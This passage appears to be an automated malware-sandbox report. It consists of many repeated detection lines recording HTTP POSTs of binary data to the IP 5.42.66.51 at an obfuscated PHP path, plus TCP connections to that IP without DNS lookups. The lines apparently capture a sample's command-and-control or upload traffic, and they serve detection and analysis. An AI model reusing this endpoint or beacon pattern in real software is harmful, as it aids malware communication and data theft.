Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2140Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2548Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2140Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2548Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2548Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2140Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continueConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2140Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2544Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2156Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2128Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /8/datalife/Async1/External8/trackpublic/bigloadGeoRequestVoiddb/4/universal3/AsyncDump/_PollupdateCentral.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 5.42.66.51Content-Length: 2552Expect: 100-continue
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
Source: unknown TCP traffic detected without corresponding DNS query: 5.42.66.51
